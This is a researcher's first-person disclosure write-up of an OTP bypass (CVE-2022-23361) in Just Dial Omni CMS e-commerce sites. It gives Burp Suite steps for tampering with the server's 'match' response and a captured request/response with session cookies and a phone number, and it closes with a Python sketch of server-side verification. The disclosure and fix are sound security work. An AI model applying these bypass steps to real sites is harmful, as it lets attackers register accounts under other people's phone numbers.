Story of a reserved CVE-2022-23361
Hello hackers, hope you are all doing well and hunting lots of bugs. This is going to be my first write-up. As the title says, I will tell you how I almost managed to get a CVE for an OTP bypass vulnerability that lets an attacker skip the mobile number verification process on all websites built with the “Just Dial Omni” CMS.
One fine day I was scrolling on Instagram watching reels when I saw an advertisement for a restaurant in my city and visited their website (they were offering a 50% discount on biryani, which is why I could not control my hands and ended up bypassing their OTP mechanism instead of ordering biryani). I was simply browsing the website and after some time it started forcing me to log in; I could not proceed any further without logging in (I was like-
After seeing this, I decided to create an account. You can register with a phone number, and the site sends a 4-digit OTP to verify that number. The first thing that came to my mind was “Let’s check how robust their OTP verification mechanism is”; I totally forgot about the biryani at that time 😂. I used BuiltWith to get an overview of the technologies behind the website and learned that it is built with the Just Dial Omni CMS.
I am sharing the complete POC below; it is very clear and easy to follow, and I have included a GitHub link where you can find the video POC as well. I reported this to Just Dial and they said it is not in their bug bounty program’s scope, lol!! :) So I decided to test more websites that use the same Just Dial Omni CMS, and to my surprise all 40+ websites I tested were vulnerable. After testing all these websites I thought, why not report this to MITRE, and I did.
POC
Vulnerability: OTP bypass
Platform: JustDial Omni CMS
Vulnerable endpoint: https://vulnerable-website/functions/market/ajxgrocpharmaction.php
Severity Level: High
Description: With the JDOmni CMS one can build a fully functional e-commerce website with login and registration functionality; a user registers an account with their mobile number and has to verify that number before going forward. An attacker can bypass the verification process by manipulating the server’s response and register with anyone’s phone number, which leads to identity theft.
Steps to Reproduce:
1. Open the vulnerable website
2. Click on signup
3. Enter a mobile number and click on "continue"
4. Enter any 4-digit number in the OTP field
5. Click on continue and capture that request in Burp Suite
6. Click on "do intercept" (intercept the response to this request) and forward the request
7. Now change the value of the "match" field from "false" to "true" in the response and forward the response
8. You will get the next screen with the registration form
9. Fill in the required details
You will see that the account has been created successfully
Impact: An attacker can create accounts using someone else’s mobile number, which leads to identity theft. All websites built with the JDOmni CMS are vulnerable.
HTTP Request:
POST /functions/market/ajxgrocpharmaction.php HTTP/1.1
Host: www.vulnerable-website.com
Cookie: webtype=undefined; googtrans=/en/en; googtrans=/en/en; NSSESSION=s%3AaA4VKiwetYg5AGBT-sQ7ZoK5DdpOPAvt.k9m6maUO7EZ6dasR407vqK5nzzXAdOwew7g2k%2FAizFs; PHPWEBSTORESESSION=aA4VKiwetYg5AGBT-sQ7ZoK5DdpOPAvt; _ga=GA1.2.498552079.1646155287; _gid=GA1.2.520074234.1646155287; _gat_gtag_UA_117667564_1=1; TawkConnectionTime=0; __tawkuuid=e::maharashtrasales.com::lvzfcZO2blVe1zXOvEDPv3ZerCmgVa7J7Q36WU96ooOMcutd3u19ql4lz1u56pcU::2; vrfycode__7355246098=2022-03-01+22%3A51%3A28
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 193
Origin: https://www.vulnerable-website.com
Referer: https://www.vulnerable-website.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
action=verifyOtp&data=%7B%22supid%22%3A51325%2C%22mobile%22%3A%227355246098%22%2C%22vcode%22%3A%2211-11%22%2C%22action%22%3A%22verifyOtp%22%2C%22from%22%3A%22signup%22%2C%22loginState%22%3A1%7D
HTTP Response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2022 17:35:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Origin: http://gammatesting.jdseller.com
Content-Length: 177
{"results":{"islimit":false,"sent":false,"displaytimer":"","match":false,"expire":true,"check_date":"","token":"","vCodeFailCnt":9},"errors":{"code":0,"msg":""}}
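The root cause is that the front end decides whether the OTP matched from the `match` field in this reply, so editing the reply is enough. Below is an added Python sketch (written for this write-up, not JDOmni’s code) of a verifyOtp handler that keeps the same response shape but records the verdict only in server-side session state; the registration step then checks that state, so a tampered `match` changes nothing. The session layout, the 300-second OTP lifetime and the 5-attempt lockout are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional

OTP_TTL = 300    # seconds an OTP stays valid (assumed policy, not JDOmni's)
MAX_FAILS = 5    # wrong attempts before lockout (assumed policy)

@dataclass
class Session:
    """Server-side session; the browser never sees or sets these fields."""
    mobile: str = ""
    otp: str = ""
    issued_at: float = 0.0
    fail_count: int = 0
    verified_mobile: Optional[str] = None

def _resp(match, islimit=False, expire=False, fails=0):
    # Same shape as the JSON the page shows; it is informational only.
    return {"results": {"match": match, "islimit": islimit, "expire": expire,
                        "vCodeFailCnt": fails}, "errors": {"code": 0, "msg": ""}}

def send_otp(session: Session, mobile: str, now: float) -> str:
    """Issue a fresh 4-digit OTP and reset verification state for this mobile."""
    session.mobile, session.issued_at = mobile, now
    session.otp = f"{secrets.randbelow(10000):04d}"
    session.fail_count, session.verified_mobile = 0, None
    return session.otp   # a real handler hands this to the SMS gateway only

def verify_otp(session: Session, mobile: str, vcode: str, now: float) -> dict:
    """Decide server-side; the outcome lives in the session, not in the reply."""
    if session.fail_count >= MAX_FAILS:
        return _resp(False, islimit=True, fails=session.fail_count)
    if not session.otp or mobile != session.mobile or now - session.issued_at > OTP_TTL:
        return _resp(False, expire=True, fails=session.fail_count)
    if not hmac.compare_digest(session.otp, vcode):   # constant-time compare
        session.fail_count += 1
        return _resp(False, fails=session.fail_count)
    session.verified_mobile = mobile
    session.otp = ""                                  # single use: no replay
    return _resp(True)

def register(session: Session, mobile: str, name: str) -> dict:
    """Registration trusts only the server-side flag set by verify_otp."""
    if session.verified_mobile != mobile:
        return {"results": None, "errors": {"code": 403, "msg": "mobile not verified"}}
    return {"results": {"registered": True, "mobile": mobile, "name": name},
            "errors": {"code": 0, "msg": ""}}
```

With this layout the client can rewrite `match` all it likes; `register` still refuses until `verify_otp` has set `verified_mobile` for that exact number.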
Hope you enjoyed this write-up. Since it was my first, your feedback and suggestions are most welcome.
Link for video poc — https://github.com/ViNi0608/CVE-2022-23361
You can find me on:-
Instagram — https://www.instagram.com/vineet_singh08/
Linkedin — https://www.linkedin.com/in/vineetsingh08
Twitter — https://twitter.com/vineet__singh08/